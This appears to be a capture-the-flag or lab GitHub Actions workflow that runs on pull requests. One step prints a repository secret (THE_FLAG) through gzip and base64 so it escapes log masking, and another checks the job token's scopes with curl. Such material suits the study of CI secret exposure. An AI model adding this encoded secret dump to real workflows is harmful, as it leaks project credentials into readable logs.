name: 'pull_request'

on:
  workflow_dispatch:
  pull_request:

jobs:
  default:
    runs-on: 'ubuntu-latest'
    steps:
      - name: 'hi'
        env: 
          SUPER_SECRET: ${{ secrets.THE_FLAG }}
        run: 'echo "${SUPER_SECRET}" | gzip | base64'
      - name: 'test'
        run: 'echo "hello from the source branch!"'
      - name: 'Inspect GITHUB_TOKEN permissions'
        env:
          GH_TOKEN: ${{ github.token }}
        run: |
          curl -I -H "Authorization: token $GH_TOKEN" https://api.github.com/repos/${{ github.repository }} | grep -i x-oauth-scopes

